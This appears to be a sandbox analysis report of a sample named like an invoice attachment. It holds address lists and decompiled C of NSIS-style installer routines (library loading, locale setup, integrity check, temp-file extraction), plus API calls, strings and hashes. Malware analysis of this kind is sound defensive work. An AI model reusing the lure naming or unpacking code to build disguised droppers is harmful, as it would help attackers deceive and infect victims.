0x004062a5
0x004062a5
0x00406305
0x0040630c
0x0040630c
0x0040630c
0x00406310
0x00406310
0x00406313
0x00406316
0x0040631a
0x0040695f
0x00000000
0x0040695f
0x00406320
0x00406323
0x00406326
0x00406329
0x0040632c
0x0040632f
0x00406332
0x00406334
0x00406337
0x0040633a
0x0040633d
0x0040633f
0x0040633f
0x0040633f
0x004064dc
0x004064dc
0x004064df
0x004064df
0x00000000
0x004064df
0x00406201
0x00000000
0x00000000
0x00000000
0x0040627e
0x004061ca
0x004061ce
0x0040693b
0x004069b7
0x004069bf
0x004069c6
0x004069c8
0x004069cf
0x004069d3
0x004069d3
0x004061d4
0x004061d7
0x004061da
0x004061de
0x004061e1
0x004061e7
0x004061e9
0x004061e9
0x004061ec
0x00000000
0x004061ec
0x00406278
0x00406181
0x00405fb5
0x00405fb5
0x00405fbe
0x004069cc
0x004069cc
0x00000000
0x004069cc
0x00405fc4
0x00000000
0x00405fcf
0x00000000
0x00000000
0x00405fd8
0x00405fdb
0x00405fde
0x00405fe2
0x00000000
0x00000000
0x00405fe8
0x00405feb
0x00405fed
0x00405fee
0x00405ff1
0x00405ff3
0x00405ff4
0x00405ff6
0x00405ff9
0x00405ffe
0x00406003
0x0040600c
0x0040601f
0x00406022
0x0040602e
0x00406056
0x00406058
0x00406066
0x00406066
0x0040606a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040605a
0x0040605a
0x0040605d
0x0040605e
0x0040605e
0x00000000
0x0040605a
0x00406034
0x00406039
0x00406039
0x00406042
0x0040604a
0x0040604d
0x00000000
0x00406053
0x00406053
0x00000000
0x00406053
0x00000000
0x00406070
0x00406070
0x00406074
0x00406920
0x00000000
0x00406920
0x0040607d
0x0040608d
0x00406090
0x00406093
0x00406093
0x00406093
0x00406096
0x0040609a
0x00000000
0x00000000
0x0040609c
0x004060a2
0x004060cc
0x004060d2
0x004060d9
0x00000000
0x004060d9
0x004060a8
0x004060ab
0x004060b0
0x004060b0
0x004060bb
0x004060c3
0x004060c6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040610b
0x00406111
0x00406114
0x00406121
0x00406129
0x00000000
0x00000000
0x004060e0
0x004060e0
0x004060e4
0x0040692f
0x00000000
0x0040692f
0x004060f0
0x004060fb
0x004060fb
0x004060fb
0x004060fe
0x00406101
0x00406104
0x00406109
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004063d0
0x004063d4
0x004063f2
0x004063f5
0x004063fc
0x004063ff
0x00406402
0x00406405
0x00406408
0x0040640b
0x0040640d
0x00406414
0x00406415
0x00406417
0x0040641a
0x0040641d
0x00406420
0x00406420
0x00406425
0x00000000
0x00406425
0x004063d6
0x004063d9
0x004063dc
0x004063e6
0x00000000
0x00000000
0x0040643a
0x0040643e
0x00406461
0x00406464
0x00406467
0x00406471
0x00406440
0x00406440
0x00406443
0x00406446
0x00406449
0x00406456
0x00406459
0x00406459
0x00000000
0x00000000
0x0040647d
0x00406481
0x00000000
0x00000000
0x00406487
0x0040648b
0x00000000
0x00000000
0x00406491
0x00406493
0x00406497
0x00406497
0x0040649a
0x0040649e
0x00000000
0x00000000
0x004064ee
0x004064f2
0x004064f9
0x004064fc
0x004064ff
0x00406509
0x00000000
0x00406509
0x004064f4
0x00000000
0x00000000
0x00406515
0x00406519
0x00406520
0x00406523
0x00406526
0x0040651b
0x0040651b
0x0040651b
0x00406529
0x0040652c
0x0040652f
0x0040652f
0x00406532
0x00406535
0x00406538
0x00406538
0x0040653b
0x00406542
0x00406547
0x00000000
0x00000000
0x004065d5
0x004065d5
0x004065d9
0x00406977
0x00000000
0x00406977
0x004065df
0x004065e2
0x004065e5
0x004065e9
0x004065ec
0x004065f2
0x004065f4
0x004065f4
0x004065f4
0x004065f7
0x004065fa
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406658
0x00406658
0x0040665c
0x00406983
0x00000000
0x00406983
0x00406662
0x00406665
0x00406668
0x0040666c
0x0040666f
0x00406675
0x00406677
0x00406677
0x00406677
0x0040667a
0x00000000
0x00000000
0x00406428
0x00406428
0x0040642b
0x00000000
0x00000000
0x00406767
0x0040676b
0x0040678d
0x00406790
0x0040679a
0x00000000
0x0040679a
0x0040676d
0x00406770
0x00406774
0x00406777
0x00406777
0x0040677a
0x00000000
0x00000000
0x00406824
0x00406828
0x00406846
0x00406846
0x00406846
0x0040684d
0x00406854
0x0040685b
0x0040685b
0x00000000
0x0040685b
0x0040682a
0x0040682d
0x00406830
0x00406833
0x0040683a
0x0040677e
0x0040677e
0x00406781
0x00000000
0x00000000
0x00406915
0x00406918
0x00000000
0x00000000
0x0040654f
0x00406551
0x00406558
0x00406559
0x0040655b
0x0040655e
0x00000000
0x00000000
0x00406566
0x00406569
0x0040656c
0x0040656e
0x00406570
0x00406570
0x00406571
0x00406574
0x0040657b
0x0040657e
0x0040658c
0x00000000
0x00000000
0x00406862
0x00406862
0x00406865
0x0040686c
0x00000000
0x00000000
0x00406871
0x00406871
0x00406875
0x004069ad
0x00000000
0x004069ad
0x0040687b
0x0040687e
0x00406881
0x00406885
0x00406888
0x0040688e
0x00406890
0x00406890
0x00406890
0x00406893
0x00406896
0x00406896
0x00406896
0x00406896
0x00406899
0x00406899
0x0040689d
0x004068fd
0x00406900
0x00406905
0x00406906
0x00406908
0x0040690a
0x0040690d
0x00000000
0x0040690d
0x0040689f
0x004068a5
0x004068a8
0x004068ab
0x004068ae
0x004068b1
0x004068b4
0x004068b7
0x004068ba
0x004068bd
0x004068c0
0x004068d9
0x004068dc
0x004068df
0x004068e2
0x004068e6
0x004068e8
0x004068e8
0x004068e9
0x004068ec
0x004068c2
0x004068c2
0x004068ca
0x004068cf
0x004068d1
0x004068d4
0x004068d4
0x004068ef
0x004068f6
0x00000000
0x004068f8
0x00000000
0x004068f8
0x00000000
0x00406594
0x00406597
0x004065cd
0x004066fd
0x004066fd
0x004066fd
0x004066fd
0x00406700
0x00406700
0x00406703
0x00406705
0x0040698f
0x00000000
0x0040698f
0x0040670b
0x0040670e
0x00000000
0x00000000
0x00406714
0x00406718
0x0040671b
0x0040671b
0x0040671b
0x00000000
0x0040671b
0x00406599
0x0040659b
0x0040659d
0x0040659f
0x004065a2
0x004065a3
0x004065a5
0x004065a7
0x004065aa
0x004065ad
0x004065c3
0x004065c8
0x00406600
0x00406600
0x00406604
0x00406630
0x00406632
0x00406639
0x0040663c
0x0040663f
0x0040663f
0x00406644
0x00406644
0x00406646
0x00406649
0x00406650
0x00406653
0x00406680
0x00406680
0x00406683
0x00406686
0x004066fa
0x004066fa
0x004066fa
0x00000000
0x004066fa
0x00406688
0x0040668e
0x00406691
0x00406694
0x00406697
0x0040669a
0x0040669d
0x004066a0
0x004066a3
0x004066a6
0x004066a9
0x004066c2
0x004066c4
0x004066c7
0x004066c8
0x004066cb
0x004066cd
0x004066d0
0x004066d2
0x004066d4
0x004066d7
0x004066d9
0x004066dc
0x004066e0
0x004066e2
0x004066e2
0x004066e3
0x004066e6
0x004066e9
0x004066ab
0x004066ab
0x004066b3
0x004066b8
0x004066ba
0x004066bd
0x004066bd
0x004066ec
0x004066f3
0x0040667d
0x0040667d
0x0040667d
0x0040667d
0x00000000
0x004066f5
0x00000000
0x004066f5
0x004066f3
0x00406606
0x00406609
0x0040660b
0x0040660e
0x00406611
0x00406614
0x00406616
0x00406619
0x0040661c
0x0040661c
0x0040661f
0x0040661f
0x00406622
0x00406629
0x004065fd
0x004065fd
0x004065fd
0x004065fd
0x00000000
0x0040662b
0x00000000
0x0040662b
0x00406629
0x004065af
0x004065b2
0x004065b4
0x004065b7
0x00000000
0x00000000
0x00000000
0x00000000
0x004064a1
0x004064a1
0x004064a5
0x0040696b
0x00000000
0x0040696b
0x004064ab
0x004064ae
0x004064b1
0x004064b4
0x004064b6
0x004064b6
0x004064b6
0x004064b9
0x004064bc
0x004064bf
0x004064c2
0x004064c5
0x004064c8
0x004064c9
0x004064cb
0x004064cb
0x004064cb
0x004064ce
0x004064d1
0x004064d4
0x004064d7
0x004064d7
0x004064d7
0x004064da
0x00000000
0x00000000
0x0040671e
0x0040671e
0x0040671e
0x00406722
0x00000000
0x00000000
0x00406728
0x0040672b
0x0040672e
0x00406731
0x00406733
0x00406733
0x00406733
0x00406736
0x00406739
0x0040673c
0x0040673f
0x00406742
0x00406745
0x00406746
0x00406748
0x00406748
0x00406748
0x0040674b
0x0040674e
0x00406751
0x00406754
0x00406757
0x0040675b
0x0040675d
0x00406760
0x00000000
0x00406762
0x00000000
0x00406762
0x00406760
0x00406995
0x00000000
0x00000000
0x00405fc4

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d33a5f9df5361017a2c2cd63e74982cac3414c6cd2676332625b738f25334a08
Instruction ID: 7fe690cacb8e5da35aefc448adc87e2f65dc6f56ff44dc44b78e187fa59068bd
Opcode Fuzzy Hash: d33a5f9df5361017a2c2cd63e74982cac3414c6cd2676332625b738f25334a08
Instruction Fuzzy Hash: 70F16871D00229CBDF28CFA8C8946ADBBB1FF44305F25816ED856BB281D7785A96CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00405E88, Relevance: 4.5, APIs: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E88(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409220);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x409224));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}

0x00405e90
0x00405e93
0x00405e9a
0x00405ea2
0x00405eaf
0x00000000
0x00405eb6
0x00405ea5
0x00405ead
0x00000000
0x00000000
0x00405ebe

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: cda0668070076e7cac62d6abfc32be1e4fdfe709f191786036c768239460f4b3
Instruction ID: 91087f9554edebef2dfdad95906e97f440013226b38390424b9c6ad62026e406
Opcode Fuzzy Hash: cda0668070076e7cac62d6abfc32be1e4fdfe709f191786036c768239460f4b3
Instruction Fuzzy Hash: 0FE08C32A08511BBD3115B30ED0896B77A8EA89B41304083EF959F6290D734EC119BFA

Uniqueness

Uniqueness Score: -1.00%

Function 00405E61, Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E61(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4224f0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4224f0;
			}

0x00405e6c
0x00405e75
0x00000000
0x00405e82
0x00405e78
0x00000000

APIs

FindFirstFileA.KERNELBASE(?,004224F0,004218A8,0040577D,004218A8,004218A8,00000000,004218A8,004218A8,?,?,73BCF560,0040549F,?,"C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" ,73BCF560), ref: 00405E6C
FindClose.KERNEL32(00000000), ref: 00405E78

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: a0d9290738f1f02d4b3743de2211279f78b4a64d0718c2c828088997ee3199ab
Instruction ID: f2fe444ddfa45285d6a9eb51d657c4c39712a0d2250b7f8498e11f87d01b5aa3
Opcode Fuzzy Hash: a0d9290738f1f02d4b3743de2211279f78b4a64d0718c2c828088997ee3199ab
Instruction Fuzzy Hash: 26D012359495206FC7001738AD0C85B7A58EF553347508B32F969F62E0C7B4AD51DAED

Uniqueness

Uniqueness Score: -1.00%

Function 004036AF, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 216
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E004036AF() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				int _t42;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t86;

				_t81 =  *0x423eb0;
				_t20 = E00405E88(6);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x4204a0;
					"1033" = 0x7830;
					E00405A4D(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x4204a0, 0);
					__eflags =  *0x4204a0;
					if(__eflags == 0) {
						E00405A4D(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x4204a0, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					E00405AC4("1033",  *_t20() & 0x0000ffff);
				}
				E00403978(_t76, _t88);
				_t85 = "C:\\Users\\jones\\AppData\\Local\\Temp";
				 *0x423f20 =  *0x423eb8 & 0x00000020;
				 *0x423f3c = 0x10000;
				if(E0040573A(_t88, "C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040573A(_t96, _t85) == 0) {
						E00405B88(0, _t79, _t81, _t85,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423688 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403978(_t76, __eflags);
							__eflags =  *0x423f40;
							if( *0x423f40 != 0) {
								_t31 = E00404FD6(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42366c;
								if( *0x42366c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420478, 5);
							_t37 = LoadLibraryA("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t86 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t86, 0x423640);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423640);
								 *0x423664 = _t86;
								RegisterClassA(0x423640);
							}
							_t42 = DialogBoxParamA( *0x423ea0,  *0x423680 + 0x00000069 & 0x0000ffff, 0, E00403A45, 0);
							E004035FF(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x423ea0;
						 *0x423654 = _t28;
						_v20 = 0x624e5f;
						 *0x423644 = E00401000;
						 *0x423650 =  *0x423ea0;
						 *0x423664 =  &_v20;
						if(RegisterClassA(0x423640) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420478 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423ea0, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t79 = 0x422e40;
					E00405A4D( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) +  *0x423ed8, 0x422e40, 0);
					_t62 =  *0x422e40; // 0x43
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x422e41;
						 *((char*)(E00405684(0x422e41, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405B66(_t85, E00405659(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E004056A0(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x004036b5
0x004036be
0x004036c5
0x004036c7
0x004036db
0x004036ed
0x004036f7
0x004036fc
0x00403702
0x00403715
0x00403715
0x00403720
0x004036c9
0x004036d4
0x004036d4
0x00403725
0x0040372f
0x00403738
0x0040373d
0x0040374e
0x004037d5
0x004037dd
0x004037e6
0x004037e6
0x004037fc
0x00403802
0x00403810
0x0040389f
0x004038a7
0x004038b1
0x004038b6
0x004038bc
0x00403946
0x0040394b
0x0040394d
0x00403969
0x00000000
0x00403969
0x0040394f
0x00403955
0x0040395d
0x0040395d
0x00000000
0x00403955
0x004038ca
0x004038db
0x004038dd
0x004038df
0x004038e6
0x004038e6
0x004038ee
0x004038f6
0x004038f8
0x004038fa
0x00403903
0x00403906
0x0040390c
0x0040390c
0x0040392b
0x0040393c
0x00000000
0x00403941
0x004038a9
0x004038ab
0x00000000
0x00403816
0x00403816
0x0040381c
0x00403826
0x0040382e
0x00403838
0x0040383e
0x0040384c
0x0040396e
0x0040396e
0x00000000
0x0040396e
0x00403852
0x0040385b
0x0040389a
0x00000000
0x0040389a
0x00403754
0x00403754
0x00403759
0x00000000
0x00000000
0x00403763
0x00403773
0x00403778
0x0040377f
0x00000000
0x00000000
0x00403783
0x00403785
0x00403792
0x00403792
0x0040379a
0x004037a0
0x004037c8
0x004037d0
0x00000000
0x004037b2
0x004037b3
0x004037bc
0x004037c2
0x004037c3
0x00000000
0x004037c3
0x004037be
0x004037c0
0x00000000
0x00000000
0x00000000
0x004037c0
0x004037a0

APIs

Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
Part of subcall function 00405E88: LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6

lstrcatA.KERNEL32(1033,004204A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004204A0,00000000,00000006,"C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403720
lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,004204A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004204A0,00000000,00000006,"C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" ), ref: 00403795
lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,004204A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004204A0,00000000), ref: 004037A8
GetFileAttributesA.KERNEL32(Call), ref: 004037B3
LoadImageA.USER32 ref: 004037FC

Part of subcall function 00405AC4: wsprintfA.USER32 ref: 00405AD1

RegisterClassA.USER32 ref: 00403843
SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 0040385B
CreateWindowExA.USER32 ref: 00403894
ShowWindow.USER32(00000005,00000000), ref: 004038CA
LoadLibraryA.KERNEL32(RichEd20), ref: 004038DB
LoadLibraryA.KERNEL32(RichEd32), ref: 004038E6
GetClassInfoA.USER32 ref: 004038F6
GetClassInfoA.USER32 ref: 00403903
RegisterClassA.USER32 ref: 0040390C
DialogBoxParamA.USER32 ref: 0040392B

Strings

RichEd32, xrefs: 004038E1
C:\Users\user\AppData\Local\Temp, xrefs: 0040372F, 00403737, 004037CF, 004037D5, 004037E5
@6B, xrefs: 0040380B
_Nb, xrefs: 00403852, 00403857
RichEdit, xrefs: 004038FD
RichEdit20A, xrefs: 004038EE, 004038F4
.exe, xrefs: 004037A2
Call, xrefs: 00403763, 0040376B, 00403778, 004037C2, 004037C8
1033, xrefs: 004036CF, 0040371B
C:\Users\user\AppData\Local\Temp\, xrefs: 004036B3
Control Panel\Desktop\ResourceLocale, xrefs: 004036E3
"C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" , xrefs: 004036BB
RichEd20, xrefs: 004038D6
.DEFAULT\Control Panel\International, xrefs: 0040370B

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" $.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 914957316-4197934828
Opcode ID: 6186cd0dc7f5b8c4dd386d80bd90aa2821d034a13263318605b4bd1c267fc880
Instruction ID: 5edcd83abe1923a5ef33726047749e404321c8c293ca1ea02831498dc8d0bb6f
Opcode Fuzzy Hash: 6186cd0dc7f5b8c4dd386d80bd90aa2821d034a13263318605b4bd1c267fc880
Instruction Fuzzy Hash: A961A3B16442007FD720AF659D45E2B3AADEB4475AF40457FF940B22E1D77CAD01CA2E

Uniqueness

Uniqueness Score: -1.00%

Function 00402C72, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00402C72(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				long _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				long _t82;
				void* _t83;
				signed int _t89;
				intOrPtr _t92;
				void* _t101;
				signed int _t103;
				void* _t105;
				long _t106;
				long _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x423eac = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\jones\\Desktop\\Proforma Invoice and Bank swift-REG.PI-0086547654.exe", 0x400);
				_t105 = E0040583D("C:\\Users\\jones\\Desktop\\Proforma Invoice and Bank swift-REG.PI-0086547654.exe", 0x80000000, 3);
				 *0x409014 = _t105;
				if(_t105 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405B66("C:\\Users\\jones\\Desktop", "C:\\Users\\jones\\Desktop\\Proforma Invoice and Bank swift-REG.PI-0086547654.exe");
				E00405B66(0x42b000, E004056A0("C:\\Users\\jones\\Desktop"));
				_t54 = GetFileSize(_t105, 0);
				 *0x41f050 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402BD3(1);
					if( *0x423eb4 == 0) {
						goto L30;
					}
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E00405F62(0x40afb8);
						E0040586C( &_v300, "C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						 *0x409018 = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004031F1( *0x423eb4 + 0x1c);
							 *0x41f054 = _t65;
							 *0x417048 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00402F18(_v16, 0xffffffff, 0, _t110, _v20); // executed
							if(_t68 == _v20) {
								 *0x423eb0 = _t110;
								 *0x423eb8 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x423ebc =  *0x423ebc + 1;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
								} while (_t101 != 0);
								_t71 =  *0x417044; // 0x3e2a7
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E004057FE(0x423ec0, _t110 + 4, 0x40);
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004031F1( *0x417040);
					if(E004031BF( &_a4, 4) == 0 || _v8 != _a4) {
						goto L30;
					} else {
						goto L26;
					}
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x423eb4) & 0x00007e00) + 0x200;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004031BF(0x417050, _t106); // executed
						if(_t83 == 0) {
							E00402BD3(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x423eb4 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402BD3(0);
							}
							goto L19;
						}
						E004057FE( &_v40, 0x417050, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							_t103 =  *0x417040; // 0x0
							 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x423eb4 = _t103;
							if(_t92 > _t109) {
								goto L30;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t109 = _t92 - 4;
								if(_t106 > _t109) {
									_t106 = _t109;
								}
								goto L19;
							} else {
								goto L22;
							}
						}
						L19:
						if(_t109 <  *0x41f050) {
							_v8 = E00405EF4(_v8, 0x417050, _t106);
						}
						 *0x417040 =  *0x417040 + _t106;
						_t109 = _t109 - _t106;
					} while (_t109 > 0);
					goto L22;
				}
			}

0x00402c80
0x00402c83
0x00402c9d
0x00402ca2
0x00402cb5
0x00402cba
0x00402cc0
0x00000000
0x00402cc2
0x00402cd3
0x00402ce4
0x00402ceb
0x00402cf3
0x00402cf8
0x00402cfa
0x00402dea
0x00402dec
0x00402df8
0x00000000
0x00000000
0x00402e01
0x00402e2d
0x00402e32
0x00402e3d
0x00402e3f
0x00402e50
0x00402e6b
0x00402e74
0x00402e79
0x00402e98
0x00402ea8
0x00402eba
0x00402ebf
0x00402ec7
0x00402ed4
0x00402edc
0x00402ee1
0x00402ee3
0x00402ee3
0x00402eeb
0x00402eeb
0x00402eee
0x00402eef
0x00402eef
0x00402ef2
0x00402ef4
0x00402ef4
0x00402ef7
0x00402efe
0x00402f0a
0x00000000
0x00402f0f
0x00000000
0x00402ec7
0x00000000
0x00402e7b
0x00402e09
0x00402e1b
